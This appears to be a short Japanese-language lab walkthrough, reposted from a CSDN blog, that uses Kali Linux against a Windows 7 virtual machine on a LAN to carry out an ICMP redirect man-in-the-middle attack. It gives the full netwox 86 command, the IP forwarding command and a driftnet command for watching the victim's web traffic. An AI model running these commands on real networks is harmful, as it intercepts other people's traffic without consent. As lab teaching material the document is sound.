LANicmpリダイレクト攻撃にkaliを使用する

1.環境への備え

攻撃マシン:kali仮想マシンのIPアドレス192.168.126.130ゲートウェイ192.168.126.2インストールnetwoxツール

ターゲットマシン:win7仮想マシンのIPアドレス192.168.126.131ゲートウェイ192.168.126.2

目的:ICMPリダイレクトメッセージをKALIを介してwin7に送信し、win7に元の192.168.126.2ゲートウェイが無効であると認識させ、データパケットが192.168.126.130を介して転送されるようにします。

2.プロセス操作

Win7は、攻撃前に通常どおりパブリックネットワークにアクセスできます

kaliで攻撃コマンドを実行する

sudo netwox 86 -f "host 192.168.126.131" -g "192.168.126.130" -i "192.168.126.2"
-f指攻击,host为靶机,-g为重定向地址,-i为原网关地址

win7では、wiresharkキャプチャを介して攻撃者が偽造したゲートウェイIDによって送信されたicmpリダイレクトメッセージを確認できます。

現時点では、win7仮想マシンはパブリックネットワークに正常にアクセスできません

kaliのコマンドを介してルーティングと転送をオンにする

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

kaliのコマンドによるオープントラフィックモニタリング

sudo driftnet -i eth0

現時点では、カリ監視ウィンドウでwin7アクセスWebサイトのデータの一部を確認できます。

おすすめ

転載: blog.csdn.net/qq_42039946/article/details/113102395